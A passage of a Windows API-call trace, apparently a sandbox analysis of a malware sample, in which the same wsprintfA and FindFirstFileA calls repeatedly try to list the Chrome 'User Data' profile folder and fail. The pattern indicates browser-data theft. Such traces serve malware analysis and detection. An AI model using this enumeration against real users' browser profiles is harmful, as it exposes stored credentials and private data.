dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.472] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.472] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.472] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.473] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.473] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.473] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.473] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.473] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.473] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.473] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.473] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.473] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.473] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.473] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.474] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.474] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.474] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.474] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.474] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.474] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.474] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.474] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.474] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.474] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.475] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.475] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.475] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.475] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.475] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.475] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.475] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.475] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.475] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.475] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.476] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.476] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.476] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.476] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.476] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.476] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.476] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.476] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.476] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.476] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.476] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.476] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.476] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.477] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.477] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.477] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.477] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.477] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.477] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.477] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.477] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.477] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.478] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.478] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.478] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.478] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.478] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.478] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.478] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.478] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.478] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.478] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.479] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.479] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 